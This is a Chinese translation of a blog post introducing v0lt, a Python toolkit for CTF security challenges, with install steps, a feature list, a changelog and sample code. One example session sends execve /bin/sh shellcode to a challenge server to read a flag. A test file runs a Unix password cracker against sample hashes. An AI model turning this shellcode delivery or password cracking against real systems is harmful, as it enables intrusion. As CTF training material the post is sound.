v0lt CTF安全工具包

0×00 v0lt

v0lt是一个我尝试重组每一个我使用过的/现在在使用的/将来要用的用python开发的安全领域CTF工具。实践任务可能会采用bash脚本来解决，但我认为Python更具有灵活性，这也是我做出这一选择的原因。和丹麦CTF队伍Gallopsled开发的pwntools 没有关系，v0lt只是一个小型灵活但是却具有一些特别功能的工具包。

0×01 要求和安装

依赖关系:

• Libmagic
• Python3

1. BeautifulSoup
2. Requests
3. filemagic
4. hexdump
5. passlib

安装:

1 2 3

git clone https: //github .com /P1kachu/v0lt .git cd v0lt [ sudo ] python3 setup.py install # 要求sudo执行是因为可能存在缺失的依赖关系

实例: Shellcodes

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28

>>> from v0lt import * >>> nc = Netcat( "archpichu.ddns.net" , 65102 ) Connected to port 65102 >>> print (nc.read()) GIVE ME SHELLCODZ >>> shellhack = ShellHack( 4096 , "bin" , "execve" ) >>> shellhack.get_shellcodes(shellhack.keywords)       ...<SNIPPED>... 85 : Linux / x86:setuid( 0 ) & execve( / sbin / poweroff - f) - 47 bytes 86 : Linux / x86:execve ( / bin / sh) - 21 Bytes 87 : Linux / x86: break chroot execve / bin / sh - 80 bytes 88 : Linux / x86:execve( / bin / sh, 0 , 0 ) - 21 bytes ...<SNIPPED>...       Selection: 86 Your choice: http: / / shell - storm.org / shellcode / files / shellcode - 752.php Shellcode: "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62[...]"       >>> nc.shellcat(shellhack.shellcode) >>> nc.writeln(shellhack.pad()) >>> exploit = nc.dialogue( "cat flag" , 3 ) >>> print (exploit) AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA: File name too long P1kaCTF{sh3llc0de_1s_e4zY}

实现功能:

加密

• Base64
• 凯撒移位
• 哈希功能(SHA, MD5)
• 位运算(XOR, 反向XOR)
• 常用转换(bytes, strings, hex)
• RSA基础模块 (逆模, 逆幂, 实现RSA共模攻击的egcd脚本…)
• 暴力破解(基于字典, 自定义词)

Shellcodes

• 从Jonathan Salwan的个人网站Shell-storm选定Shellcode并用repo工具下载
• Shellcode格式
• Shell{cat,net}: 轻松发送Shellcode
• 自动填充

连接支持

• Netcat
• Telnet

更多可获得的实例:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68

import unittest       from v0lt import *       __author__ = 'P1kachu'       class Tests(unittest.TestCase):      def test_netcat( self ):          nc = Netcat( "archpichu.ddns.net" , 65103 )          self .assertEqual(nc.read(), "\nNothing to display yet...\n" )            def test_telnet( self ):          tl = Telnet( "archpichu.ddns.net" , 65103 )          self .assertEqual(tl.read(), "\nNothing to display yet...\n" )            def test_stack( self ):          stack = Stack()          self .assertEqual(stack.size(), 0 )          stack.push( "item" )          self .assertEqual(stack.is_empty(), False )          self .assertEqual(stack.size(), 1 )          item = stack.pop()          self .assertEqual(stack.size(), 0 )          self .assertEqual(item, "item" )          self .assertEqual(stack.is_empty(), True )            def test_basic_ceasar( self ):          plaintext = "This is a ceasar plaintext"          encrypted = "GUVF VF N PRNFNE CYNVAGRKG"          deciphered = basic_ceasar(plaintext, offset = 13 )          self .assertEqual(encrypted, deciphered)            def test_get_shellcode( self ):          sh = ShellHack( 70 , "/bin/lol" )              sh.get_shellcodes(sh.keywords)          sh = ShellHack( 70 , "/bin/sh" )          sh.get_shellcodes(sh.keywords)            def test_flag_gen( self ):          flags_gen( "flags.tmp" , "P1ka" , 10 )            def test_find_nth( self ):          self .assertEqual(find_nth( "lolilol" , "l" , 3 ), 6 )          self .assertEqual(find_nth( "lolilol" , "l" , 4 ), - 1 )            def brute( self ):          bf = Bruteforce(charset = "abcd" , final_length = 5 , begin_with = "l" , end_with = "P" )          bf.generate_strings()          bf = Bruteforce(charset = "abcdef" , final_length = 12 , begin_with = "l" , end_with = "P" )          bf.generate_strings(output = "bf.tmp" )            def test_hex( self ):          he = Hexeditor()          he.dump_file( "setup.py" )          he.save_file_as_hex( "save.tmp" )          he.restore_file( "test1.tmp" )          he.restore_file( "test2.tmp" , "save.tmp" )            def test_passwd_cracker( self ):          nix_basic_pass_cracker( "HX9LLTdc/jiDE" )          nix_basic_pass_cracker( "HX8LLTdc/jiDE" )          # nix_basic_pass_cracker("$1$khkWa1Nz$7YcmdOO1/uyHhMB7ga2L.1")          # nix_basic_pass_cracker("$5$khkWa1Nz$583CsGZkoT82wh2ukf75KT4VVrf9ZO/P0FXLiPKgG//")          # nix_basic_pass_cracker("$6$P1$XKg/SKZpe8Gbl5Utt3XVJEA4zJ6KB.IuZlShnP2FljfF32z3zoytnB.MaP9dJOObSOtiidHmeBp.feOqK4Mvg/")       if __name__ = = "__main__" :      suite = unittest.defaultTestLoader.loadTestsFromTestCase(Tests)      unittest.TextTestRunner().run(suite)

0×02 变更记录

只包括主要功能和变化。错误修正和次要的变化略。

1.3 版本

• 再次做了许多修复
• Hexeditor (转储/重写文件)
• Unix密码暴力破解

1.2 版本

• 修改/修复/修正了许多文档/bugs/框架
• 增加了暴力破解模块
• 增加了linux下一些实用工具
• 增加了Hexeditor
• Shellhack修复
• 增加了警报信息

1.0 版本

• 修改了许多文档
• 修复了许多bugs
• 增加了shellhack (shellcodes参照工具)
• 增加了加密工具
• 增加了网络方面工具
• 固定了项目树

译者注:
项目作者：P1kachu
项目主页：https://github.com/P1kachu/v0lt

转载请注明来自4ido10n's Blog文章《v0lt CTF安全工具包》

转载于:https://www.cnblogs.com/daban/p/5680543.html